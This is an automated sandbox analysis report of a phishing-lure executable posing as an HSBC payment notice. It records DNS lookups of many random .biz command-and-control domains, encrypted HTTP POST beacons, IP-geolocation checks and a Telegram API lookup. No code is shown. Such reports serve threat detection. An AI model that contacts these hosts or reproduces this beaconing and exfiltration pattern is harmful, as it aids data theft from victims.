                                                                                                                                                                              Dec 11, 2024 09:28:09.271538973 CET4996480192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:28:09.271564960 CET4996480192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:28:09.392013073 CET804996418.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:09.392035961 CET804996418.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:11.355875969 CET804996418.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:11.355987072 CET804996418.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:11.356100082 CET4996480192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:28:11.356175900 CET4996480192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:28:11.476582050 CET804996418.141.10.107192.168.2.5

                                                                                                                                                                              UDP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 11, 2024 09:26:06.715599060 CET6015753192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:07.194257021 CET53601571.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:08.771385908 CET4973953192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:09.239639044 CET53497391.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:09.956470013 CET6147553192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:10.094953060 CET53614751.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:11.489006996 CET5842453192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:11.964744091 CET53584241.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.958703041 CET6465653192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:13.096537113 CET53646561.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:13.552428961 CET5417353192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:14.045520067 CET53541731.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.945664883 CET6095253192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:15.086813927 CET53609521.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.356321096 CET5813053192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:15.859508038 CET53581301.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:17.197757959 CET5873353192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:17.336075068 CET53587331.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:20.725092888 CET5227553192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:21.128962040 CET53522751.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.273940086 CET5378053192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:22.411789894 CET53537801.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.131880045 CET5132553192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:25.355968952 CET53513251.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.356894970 CET6311653192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:25.977432013 CET53631161.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:28.635011911 CET6008353192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:28.870990992 CET53600831.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:29.003189087 CET5942453192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:29.216865063 CET53594241.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:29.220451117 CET5233553192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:30.097273111 CET53523351.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:14.800203085 CET5769653192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:27:15.798722029 CET53576961.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:00.024872065 CET5488953192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:28:00.579090118 CET53548891.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:02.773384094 CET5621353192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:28:03.530263901 CET53562131.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:06.460102081 CET6307653192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:28:07.079525948 CET53630761.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:08.323911905 CET6045453192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:28:08.902352095 CET53604541.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:11.356839895 CET6391553192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:28:11.978425980 CET53639151.1.1.1192.168.2.5

                                                                                                                                                                              DNS Queries

                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 11, 2024 09:26:06.715599060 CET192.168.2.51.1.1.10xb8fStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:08.771385908 CET192.168.2.51.1.1.10x9442Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:09.956470013 CET192.168.2.51.1.1.10x4a1eStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:11.489006996 CET192.168.2.51.1.1.10x8665Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:12.958703041 CET192.168.2.51.1.1.10x1690Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:13.552428961 CET192.168.2.51.1.1.10xefbcStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:14.945664883 CET192.168.2.51.1.1.10x944fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:15.356321096 CET192.168.2.51.1.1.10xa56eStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:17.197757959 CET192.168.2.51.1.1.10xbba7Standard query (0)ww99.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:20.725092888 CET192.168.2.51.1.1.10x63cStandard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:22.273940086 CET192.168.2.51.1.1.10x5b64Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:25.131880045 CET192.168.2.51.1.1.10x313cStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:25.356894970 CET192.168.2.51.1.1.10x2e04Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:28.635011911 CET192.168.2.51.1.1.10xd30bStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:29.003189087 CET192.168.2.51.1.1.10x67ceStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:29.220451117 CET192.168.2.51.1.1.10xb5c6Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:27:14.800203085 CET192.168.2.51.1.1.10xb4fStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:00.024872065 CET192.168.2.51.1.1.10xfe9fStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:02.773384094 CET192.168.2.51.1.1.10x9f19Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:06.460102081 CET192.168.2.51.1.1.10xa470Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:08.323911905 CET192.168.2.51.1.1.10x6a7Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:11.356839895 CET192.168.2.51.1.1.10x6013Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false

                                                                                                                                                                              DNS Answers

                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 11, 2024 09:26:07.194257021 CET1.1.1.1192.168.2.50xb8fNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:09.239639044 CET1.1.1.1192.168.2.50x9442No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:10.094953060 CET1.1.1.1192.168.2.50x4a1eNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:11.964744091 CET1.1.1.1192.168.2.50x8665No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:13.096537113 CET1.1.1.1192.168.2.50x1690No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:13.096537113 CET1.1.1.1192.168.2.50x1690No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:13.096537113 CET1.1.1.1192.168.2.50x1690No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:13.096537113 CET1.1.1.1192.168.2.50x1690No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:13.096537113 CET1.1.1.1192.168.2.50x1690No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:13.096537113 CET1.1.1.1192.168.2.50x1690No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:14.045520067 CET1.1.1.1192.168.2.50xefbcNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:15.086813927 CET1.1.1.1192.168.2.50x944fNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:15.086813927 CET1.1.1.1192.168.2.50x944fNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:15.859508038 CET1.1.1.1192.168.2.50xa56eNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:15.859508038 CET1.1.1.1192.168.2.50xa56eNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:17.336075068 CET1.1.1.1192.168.2.50xbba7No error (0)ww99.przvgke.biz72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:21.128962040 CET1.1.1.1192.168.2.50x63cNo error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:21.128962040 CET1.1.1.1192.168.2.50x63cNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:21.128962040 CET1.1.1.1192.168.2.50x63cNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:22.411789894 CET1.1.1.1192.168.2.50x5b64No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:25.355968952 CET1.1.1.1192.168.2.50x313cName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:25.977432013 CET1.1.1.1192.168.2.50x2e04No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:28.870990992 CET1.1.1.1192.168.2.50xd30bName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:29.216865063 CET1.1.1.1192.168.2.50x67ceName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:26:30.097273111 CET1.1.1.1192.168.2.50xb5c6No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:27:15.798722029 CET1.1.1.1192.168.2.50xb4fNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:00.579090118 CET1.1.1.1192.168.2.50xfe9fNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:03.530263901 CET1.1.1.1192.168.2.50x9f19No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:07.079525948 CET1.1.1.1192.168.2.50xa470No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:08.902352095 CET1.1.1.1192.168.2.50x6a7No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:11.978425980 CET1.1.1.1192.168.2.50x6013No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 11, 2024 09:28:11.978425980 CET1.1.1.1192.168.2.50x6013No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false

                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                              • reallyfreegeoip.org
                                                                                                                                                                              • api.telegram.org
                                                                                                                                                                              • pywolwnvd.biz
                                                                                                                                                                              • ssbzmoy.biz
                                                                                                                                                                              • cvgrf.biz
                                                                                                                                                                              • checkip.dyndns.org
                                                                                                                                                                              • npukfztj.biz
                                                                                                                                                                              • przvgke.biz
                                                                                                                                                                              • ww99.przvgke.biz
                                                                                                                                                                              • ww12.przvgke.biz
                                                                                                                                                                              • knjghuig.biz
                                                                                                                                                                              • lpuegx.biz
                                                                                                                                                                              • vjaxhpbji.biz
                                                                                                                                                                              • xlfhhhm.biz
                                                                                                                                                                              • ifsaia.biz
                                                                                                                                                                              • saytjshyf.biz
                                                                                                                                                                              • vcddkls.biz

                                                                                                                                                                              HTTP Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.54970454.244.188.177801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:07.415178061 CET360OUTPOST /ihnlsqbtrmkahnv HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:07.415178061 CET850OUTData Raw: 33 22 6e 74 0f e8 51 63 46 03 00 00 eb c0 5e dc cd 68 6a 03 b4 92 ff 50 54 c7 5f 0e f2 5f 52 a1 20 77 fc 75 8d 2f 22 ca 88 2e ca eb 52 aa 3c b0 d1 4c 6f f4 46 22 72 77 87 1f 3b 61 d5 d5 ea 08 fb ce 17 ab 1c 38 94 c7 b2 a9 5d 66 53 2a 4d 68 64 34
                                                                                                                                                                              Data Ascii: 3"ntQcF^hjPT__R wu/".R<LoF"rw;a8]fS*Mhd4`'d*VsVrY<"A*2f&L*H+N|!%,iihyB.w[)u1vqv$qn`R!nI\z+wL<9D
                                                                                                                                                                              Dec 11, 2024 09:26:08.756006002 CET413INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:08 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=9e6364b128142aad518b5fb15c7e6226|8.46.123.175|1733905568|1733905568|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.54970554.244.188.177801900C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:08.414887905 CET361OUTPOST /taohikdratudiqxk HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 892
                                                                                                                                                                              Dec 11, 2024 09:26:08.414907932 CET892OUTData Raw: c2 6a d9 07 fb da 7a 94 70 03 00 00 de f6 78 ec 1b ae 80 93 d0 99 ad 18 ea ad b0 d3 4e 97 d2 b2 49 dc fc db 85 03 6f 3d 24 a8 93 64 24 64 98 89 f7 40 68 53 17 25 f0 ae 5e 61 eb 0c d7 08 e0 1d 80 7a aa 09 b8 51 9c ec 0e 96 a7 5f c1 a1 4b ff 22 ca
                                                                                                                                                                              Data Ascii: jzpxNIo=$d$d@hS%^azQ_K"P92>?jc^Z,@<WAx;~&f^|X>xle5g_`VL)[F?AWc*9d,oqtD^[ ;^?
                                                                                                                                                                              Dec 11, 2024 09:26:09.952672005 CET413INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:09 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=c8529f88a23a1473b2c4eb68005a87ca|8.46.123.175|1733905569|1733905569|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.54970618.141.10.107801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:09.390573978 CET346OUTPOST /jji HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: ssbzmoy.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:09.390573978 CET850OUTData Raw: 67 06 df e1 23 b7 5e ee 46 03 00 00 d4 95 eb a2 59 06 3a 98 71 7f c0 19 25 16 4a 64 fa 49 7d d7 50 f2 d1 27 66 03 fd 67 11 28 40 1c 80 37 7e 4e 8c 06 ee 81 39 e1 a1 f3 0e df 98 1f f0 ef 11 6d 5e af 91 3b ff a6 0b de 1f 4c 07 64 3b 22 fa 68 09 03
                                                                                                                                                                              Data Ascii: g#^FY:q%JdI}P'fg(@7~N9m^;Ld;"hngMuBHSpO~h@LqM10C~.(bg~R2AT/Tq{t {;`aJe'g>h4+6#}0 :!U{eV9{@!Z/Z
                                                                                                                                                                              Dec 11, 2024 09:26:11.482453108 CET411INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:11 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=71d15fdeb3553ba37d25f6c980a76286|8.46.123.175|1733905571|1733905571|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.54970718.141.10.107801900C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:10.574706078 CET355OUTPOST /xxitmchctwqm HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: ssbzmoy.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 892
                                                                                                                                                                              Dec 11, 2024 09:26:10.574822903 CET892OUTData Raw: f3 1e 46 09 81 83 2d 50 70 03 00 00 29 40 4b d3 00 58 42 4d 41 d1 f9 1b 77 54 6d fa 3f 28 b0 48 15 59 6b b0 d4 ad a1 a9 36 12 6e 93 2f cb fc 10 e5 69 42 ba aa ef 60 37 c5 ad c9 79 0c 0b 39 94 62 2f ac 13 40 d6 50 bb 80 9e 49 94 01 a3 ee 60 81 ac
                                                                                                                                                                              Data Ascii: F-Pp)@KXBMAwTm?(HYk6n/iB`7y9b/@PI`C3pq,tFR>\"a'G4/xh/.@)hw;HG$$nKx$vElc1c/9.hx+6O'|q
                                                                                                                                                                              Dec 11, 2024 09:26:12.597376108 CET411INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:12 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=ab5ba53552658635c603ec7ec592bdab|8.46.123.175|1733905572|1733905572|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.54970854.244.188.177801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:12.181054115 CET356OUTPOST /yfypviummaqwyuq HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: cvgrf.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:12.181054115 CET850OUTData Raw: 2c 64 c2 4c b2 9e ee 79 46 03 00 00 d2 73 76 d1 5d 10 5d 0d 1d f3 d8 be 79 7c 0e b3 56 de b2 20 5c 91 bf 40 09 e3 ff d6 b0 f9 17 5b f9 da 75 b0 4d df 84 ac fd 83 42 ab ce 9e b3 fc 76 0a 24 c5 ac 9d 55 7c a2 26 a7 7a f9 09 59 08 87 12 b5 3f 77 55
                                                                                                                                                                              Data Ascii: ,dLyFsv]]y|V \@[uMBv$U|&zY?wUsK*,SKeg!+dB"wT4;+rO<'mE;Q`5%q%NAPv+}wpv8VFK,;h[:um=X;{p{F_1L
                                                                                                                                                                              Dec 11, 2024 09:26:13.539892912 CET409INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:13 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=1896e6d0cf42eea53eefff63fe23976c|8.46.123.175|1733905573|1733905573|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.549709193.122.6.168807188C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:13.223695993 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Dec 11, 2024 09:26:14.493051052 CET321INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:14 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Request-ID: 468fbb04354184ba67f0ab6df26a887c
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
                                                                                                                                                                              Dec 11, 2024 09:26:14.497525930 CET127OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
